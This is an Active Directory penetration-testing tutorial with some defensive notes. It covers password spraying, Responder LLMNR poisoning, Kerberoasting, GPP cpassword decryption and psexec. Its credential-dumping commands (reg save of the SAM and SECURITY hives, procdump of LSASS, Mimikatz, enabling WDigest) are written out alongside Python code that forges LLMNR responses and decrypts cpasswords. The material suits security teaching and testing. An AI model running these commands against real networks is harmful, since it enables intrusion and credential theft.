PENTEST ACTIVE DIRECTORY FROM SCRATCH
- Finding logins/passwords from outside the network
- Brute-force / password-spraying attacks against the services reachable from the internet:
- Email (Office 365, OWA)
- Communication (Lync, XMPP, WebEx)
- Collaboration (JIRA, Slack, Teams, etc.)
- Other services (CMS, support portals, Jenkins, etc.)
Spray a few likely passwords across many accounts rather than many passwords against one account, and stay below the domain lockout threshold, otherwise you lock out the very accounts you are trying to get into.
Tools: Spray (from SpiderLabs), Ruler
- Finding logins/passwords inside the network
- Inside the network but without an account
- Responder:
Simplified explanation: when a host on the network makes a DNS lookup that fails (for example, it looks for a file share that no longer exists), Windows falls back to LLMNR (Link-local Multicast Name Resolution) and then to NBT-NS.
So when the victim PC cannot resolve the name through DNS, it asks everyone on the local segment whether they know where that host is (a multicast/broadcast query).
Responder answers that query claiming to be the hostname the victim is looking for. The victim then connects to us and authenticates with NTLMv2.
What the attacker captures is not the NT hash itself but the NetNTLMv2 challenge/response (hashcat mode 5600). It cannot be replayed for pass-the-hash, but it can be cracked offline.
All that remains is to crack it, with hashcat for example.
Small tip: if you cannot or do not have time to crack the hash, Responder can instead force HTTP Basic authentication (the -b option), which makes a login pop-up appear on the victim's screen; users frequently type their password into it, and it then arrives in clear text.
- MultiRelay (Responder++): instead of cracking the captured authentication, relay it to another host (NTLM relay). This only works against targets that do not require SMB signing, so check signing first.
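The LLMNR exchange described above, as an added example that is not part of the original notes and not Responder's own code: it builds the query a victim multicasts to 224.0.0.252:5355, the poisoned answer an attacker unicasts back, parses both, and adds a canary check a defender can use to spot a poisoner. The host name fileserver01, the transaction ID and the address 10.0.0.66 are constructed.

```python
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # IPv4 multicast group and port from RFC 4795


def encode_name(name: str) -> bytes:
    """DNS-style label encoding: length-prefixed labels, terminated by a zero byte."""
    labels = name.strip(".").split(".")
    return b"".join(bytes([len(label)]) + label.encode("ascii") for label in labels) + b"\x00"


def decode_name(buf: bytes, off: int):
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            break
        if n & 0xC0 == 0xC0:                       # compression pointer (0xC0xx) into the message
            ptr = ((n & 0x3F) << 8) | buf[off]
            off += 1
            labels.append(decode_name(buf, ptr)[0])
            break
        labels.append(buf[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels), off


def build_query(name: str, txid: int) -> bytes:
    """What the victim multicasts after DNS fails: one A question, no answers."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", 1, 1)   # QTYPE=A, QCLASS=IN


def build_poisoned_response(query: bytes, answer_ip: str, ttl: int = 30) -> bytes:
    """What a poisoner unicasts back: same ID, QR bit set, the question echoed,
    and an A record pointing the requested name at the attacker's address."""
    txid = struct.unpack(">H", query[:2])[0]
    name, off = decode_name(query, 12)
    question = query[12:off + 4]
    header = struct.pack(">HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    answer = encode_name(name) + struct.pack(">HHIH", 1, 1, ttl, 4) + socket.inet_aton(answer_ip)
    return header + question + answer


def parse_llmnr(msg: bytes) -> dict:
    txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", msg[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = decode_name(msg, off)
        qtype, _qclass = struct.unpack(">HH", msg[off:off + 4])
        off += 4
        questions.append((name, qtype))
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        answers.append((name, rtype, ttl, socket.inet_ntoa(rdata) if rtype == 1 and rdlen == 4 else rdata))
    return {"id": txid, "is_response": bool(flags & 0x8000), "questions": questions, "answers": answers}


def canary_hit(msg: bytes, canary: str):
    """Detection trick: periodically query a name that exists nowhere. A healthy
    network never answers it; a poisoner always does. Returns the address that
    claimed the canary name, or None."""
    parsed = parse_llmnr(msg)
    if not parsed["is_response"]:
        return None
    for name, rtype, _ttl, addr in parsed["answers"]:
        if rtype == 1 and name.lower() == canary.lower():
            return addr
    return None


if __name__ == "__main__":
    # Constructed exchange: the victim asks for a share server that no longer exists,
    # the attacker at 10.0.0.66 answers. Names and addresses are made up for this example.
    query = build_query("fileserver01", 0x1234)
    response = build_poisoned_response(query, "10.0.0.66")
    print(parse_llmnr(query))
    print(parse_llmnr(response))
    print("poisoner:", canary_hit(response, "fileserver01"))
```

The canary approach is how detection tools for this attack work: a response to a name nobody registered can only come from something answering indiscriminately. On the prevention side, disabling LLMNR and NBT-NS through group policy removes the fallback entirely.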
- Enumerating users without credentials
- Abuse Kerberos (the KDC's pre-authentication error reveals whether a username exists; the realm is the AD domain name, not the DC hostname):
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='<DomainName>',userdb='<PathToUsersWordlist>' <DomainControllerIp>
- CrackMapExec (CME), password spraying once you have a user list (with two wordlists CME tries every combination, so mind the lockout policy):
cme smb <ip> -d '<DomainName>' -u '<UsersWordlist>' -p '<PasswordWordlist>'
- After compromising your first victim
- Enumeration
- Network Info
- netstat -ano | findstr LISTENING
- net group "Domain Admins" /domain
- Process List
- tasklist /v
- System Info
- systeminfo
- Get-WmiObject -Class Win32_OperatingSystem | Select-Object -Property *
- Password Search
- dir /s *password*
- findstr /s /n /i /p foo *
- findstr /si password *.txt *.xml *.ini
Python script: RTFM.py (offline command reference)
- Privilege Escalation
- Unquoted Service Path
- Web / Windows cred
- UserSPN
We see several different shares, which we try to connect to one after the other over SMB.
Looking through the NETLOGON share we find a file containing a "cpassword" attribute. But what is it?
cpassword is the name of the attribute that stores passwords inside a Group Policy Preference item (the file was found in the Preferences subfolder). Whenever a preference needs to be saved with a password, the password itself is stored in this attribute. The attribute is just a value in an XML file stored in the SYSVOL share of the Domain Controllers, which every domain user can read.
This is what a cpassword looks like:
The value is AES-256 encrypted, but Microsoft published the key in the MS-GPPREF documentation, so anyone who can read the file can decrypt it. A few seconds of searching turns up gpp-decrypt (already present in Kali), a script that decrypts the cpassword:
- root@kali:~# gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
The nmap scan showed port 88 open with Kerberos. Any domain user can request a service ticket (TGS) for any account that has a Service Principal Name (SPN) registered, and that ticket is encrypted with the service account's password hash, so it can be cracked offline (Kerberoasting). The interesting targets are ordinary user accounts that carry an SPN, since their passwords are chosen by humans. That is why we downloaded impacket from GitHub to use its GetUserSPNs.py script:
https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py
We end up with a Kerberos TGS hash:
Which we store in a file and submit to hashcat (mode 13100 is Kerberos 5 TGS-REP, etype 23):
- hashcat -m 13100 hash.txt -a 0 /usr/share/wordlists/rockyou.txt --force
(--show only prints hashes already cracked in the potfile, so run it afterwards to display the result rather than together with the cracking run.)
And there it is, the password of an admin account.
We now use psexec, either the Metasploit module or impacket's psexec.py (as you want). Psexec executes a command remotely on the victim and returns the output; it needs local administrator rights on the target and write access to the ADMIN$ share.
From there you have control of the victim with administrator rights. TADAM!
- Dumping Clear-Text Credentials
Passwords stored in clear text on a Windows host allow penetration testers to move laterally inside an internal network and eventually compromise it fully. Therefore, on a system that has been compromised with elevated access (Local Administrator or SYSTEM) and where persistence has been achieved, hunting for clear-text passwords should be one of the first post-exploitation activities: it is the easiest and fastest way to reach domain administrator privileges, and at the same time one of the least noisy.
This article lists Windows locations where passwords might exist and techniques to retrieve them.
LSA Secrets
LSA Secrets is a registry location containing sensitive data used by the Local Security Authority: service account passwords, the auto-logon password (DefaultPassword), the key protecting cached domain logons, and other secrets. It is stored under the following registry key.
HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
Because of the sensitivity of this information, Windows protects the SECURITY hive with permissions: by default only the SYSTEM account can read the LSA Secrets location, so an administrator has to grant themselves access first or run as SYSTEM.
LSA Secrets – Registry Permissions
Granting the administrator account the appropriate permissions and re-opening the registry editor reveals all the subkeys contained under SECURITY.
LSA Secrets – Registry Location
This location contains, among other secrets, the DefaultPassword used for automatic logon, in encrypted form. The key needed to decrypt it is stored in the parent key, Policy, and is itself protected by the boot key kept in the SYSTEM hive:
HKEY_LOCAL_MACHINE\SECURITY\Policy
Besides SECURITY, the hives of interest are SAM (local account password hashes) and SYSTEM (the boot key needed to decrypt both). From an elevated command prompt the hives can be saved with the reg utility.
reg save hklm\sam c:\temp\sam.save
reg save hklm\security c:\temp\security.save
reg save hklm\system c:\temp\system.save
Dump Registry Hives
The Impacket suite contains a Python script, secretsdump.py, that reads these saved hives offline and decrypts the LSA Secrets, including the DefaultPassword.
impacket – Registry Hives
Alternatively there is a post-exploitation module in Metasploit that can be used from an existing Meterpreter session to retrieve the password in clear text.
post/windows/gather/lsa_secrets
Metasploit – LSA Secrets
The same output can be achieved with the lsaSecretRead binary.
lsaSecretRead.exe DefaultPassword
lsaSecretRead – Read LSA Secret Password
LSASS Process
The Local Security Authority Subsystem Service (LSASS) enforces the security policy on a Windows host. On Windows versions up to Windows 8 and Windows Server 2012, the LSASS process kept passwords in clear text in memory to support WDigest and SSP authentication, so tools such as Mimikatz could retrieve them easily. The process memory can be dumped with a Microsoft-signed tool such as procdump and analysed elsewhere:
procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
Procdump – lsass process
From Windows 8.1 and Windows Server 2012 R2 (and on older systems with update KB2871997 installed) Microsoft stopped LSASS from storing WDigest passwords in clear text by default. However, on a system that has already been compromised with elevated privileges, a single registry value instructs LSASS to keep clear-text passwords in memory again, starting from the next logon of each user. Defenders should alert on this value being created or set to 1 (Sysmon event ID 13 or registry auditing).
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, value UseLogonCredential (DWORD) = 1
Mimikatz – Registry Setting for Windows 2012 and 2016
The Metasploit Framework has a post-exploitation module which enables caching of WDigest credentials by modifying the registry automatically.
post/windows/manage/wdigest_caching
Metasploit – WDigest Caching
Mimikatz can be used offline to read the contents of the LSASS dump, in particular the sections that contain logon passwords.
mimikatz.exe log "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" exit
Mimikatz – LSASS dump
The password of the user John was retrieved in plain text through the WDigest authentication provider.
Mimikatz – ClearText Password in LSASS
Alternatively Mimikatz can be dropped onto the target directly if the system has no endpoint protection, or if the binary has been modified to evade detection.
privilege::debug
sekurlsa::logonPasswords full
Mimikatz – Logon Passwords Command
The Metasploit Framework has an extension (kiwi) that can be loaded into Meterpreter to execute Mimikatz commands directly from memory.
Mimikatz – Kiwi Meterpreter Extension
WDigest authentication credentials can be retrieved by executing the following command (creds_wdigest in the kiwi extension):
Mimikatz – wdigest credentials via Meterpreter Kiwi
Windows Credential Editor can also retrieve WDigest passwords in clear text on older Windows versions (XP to Windows 8). On Windows Server 2012 R2, 2016, Windows 8.1 and Windows 10 the Mimikatz method is more reliable.
wce.exe -w
Windows Credential Editor
Running the PowerShell port of Mimikatz (Invoke-Mimikatz from PowerSploit) directly from the console or from memory will also retrieve the passwords from the LSASS process.
Mimikatz – PowerSploit
Credential Manager
Windows uses Credential Manager to store various other credentials in encrypted form through the Windows Data Protection API (DPAPI). Credentials that the user has saved to access an internal system over the web or a network resource can be retrieved.
Running LaZagne on the target host retrieves the passwords stored on the system by many applications, in various formats (not only plain text).
LaZagne
Browser-stored passwords, however, are retrieved in plain text. This can give the penetration tester the opportunity to expand access to other systems.
LaZagne – Browser Based Passwords
Nikhil Mittal developed a PowerShell script, part of the Nishang framework, that retrieves passwords from the Windows Vault, similar to what LaZagne does.
Nishang – Get-WebCredentials PowerShell Script
Group Policy Preferences
Windows workstations joined to a domain can read the Groups.xml file from the domain controller's SYSVOL share, and the file is often also cached locally on the workstation. The locations on the Domain Controller and on the host itself are shown below:
\\DC.PENTESTLAB.LOCAL\SYSVOL\pentestlab.local\Policies\{xxx}\MACHINE\Preferences\Groups\Groups.xml
C:\ProgramData\Microsoft\Group Policy\History\{xxx}\Machine\Preferences\Groups\Groups.xml
This file contains the cPassword value encrypted with AES-256, but the key is publicly known (Microsoft published it in the MS-GPPREF specification), so any domain user who can read SYSVOL can decrypt it. Groups.xml is not the only file to check: Services.xml, ScheduledTasks.xml, DataSources.xml and Drives.xml can carry a cPassword too. MS14-025 stopped Windows from writing new cPassword values, but it does not remove the ones already in SYSVOL. Various scripts decrypt the value, and the Metasploit Framework automates the task with the post-exploitation module below.
post/windows/gather/credentials/gpp
Metasploit – Decrypting GPP Passwords
Full details of decrypting GPP passwords can be found in the article Group Policy Preferences.
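The cpassword harvesting described in this section and in the NETLOGON/gpp-decrypt walkthrough earlier on the page, as an added example that is not gpp-decrypt's, Metasploit's or the original author's code. It walks every preference file type that can carry a cpassword (not only Groups.xml), restores the base64 padding that GPP strips, and decrypts with the published key. The SYSVOL contents are constructed inline: the cpassword value is the one shown earlier on the page, while the account names, the task name and the paths are made up. Decryption uses the cryptography package and returns None when it is not installed.

```python
import base64
import xml.etree.ElementTree as ET

# AES-256 key published by Microsoft in MS-GPPREF (section 2.2.1.1.4); the IV is 16 zero bytes.
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
GPP_IV = bytes(16)

# Attribute that names the account in each preference file type that can carry a cpassword
# (Groups/Drives: userName, Services: accountName, ScheduledTasks: runAs, DataSources: username).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def pad_b64(value: str) -> str:
    """GPP strips the '=' padding from the base64 text; restore it before decoding."""
    return value + "=" * (-len(value) % 4)


def find_cpasswords(xml_text: str, source: str):
    """Returns (source, account, raw ciphertext) for every cpassword attribute in one XML file."""
    found = []
    for elem in ET.fromstring(xml_text).iter():
        cpass = elem.get("cpassword")
        if not cpass:
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), None)
        found.append((source, account, base64.b64decode(pad_b64(cpass))))
    return found


def decrypt_cpassword(ciphertext: bytes):
    """AES-256-CBC with the public key, PKCS#7 padding removed, UTF-16LE text.
    Returns None if the cryptography package is not available."""
    try:
        from cryptography.hazmat.primitives import padding
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    except ImportError:
        return None
    dec = Cipher(algorithms.AES(GPP_KEY), modes.CBC(GPP_IV)).decryptor()
    padded = dec.update(ciphertext) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return (unpad.update(padded) + unpad.finalize()).decode("utf-16le")


# Constructed SYSVOL contents for this example (paths and account names are made up;
# the cpassword value is the one shown earlier on the page).
CONSTRUCTED_SYSVOL = {
    r"Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml": """
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
      changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Administrator (built-in)"/>
  </User>
</Groups>""",
    r"Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml": """
<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <Task clsid="{2DEECB1C-261F-4e13-9B21-16FB83BC03BD}" name="backup">
    <Properties action="C" runAs="CORP\\svc_backup" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"/>
  </Task>
</ScheduledTasks>""",
}


def harvest(sysvol: dict):
    """Returns [(file, account, plaintext-or-None)] across every preference file found."""
    results = []
    for path, text in sysvol.items():
        for source, account, raw in find_cpasswords(text, path):
            try:
                plaintext = decrypt_cpassword(raw)
            except ValueError:
                plaintext = None          # not valid AES/PKCS#7 output under this key
            results.append((source, account, plaintext))
    return results


if __name__ == "__main__":
    for path, account, secret in harvest(CONSTRUCTED_SYSVOL):
        print(f"{path}\n  {account}: {secret if secret is not None else '(install cryptography to decrypt)'}")
```

On a real engagement the dictionary would be filled by walking \\DC\SYSVOL\<domain>\Policies recursively and reading every Preferences\*\*.xml, and the local Group Policy\History cache on a workstation can be walked the same way when the DC share is not reachable.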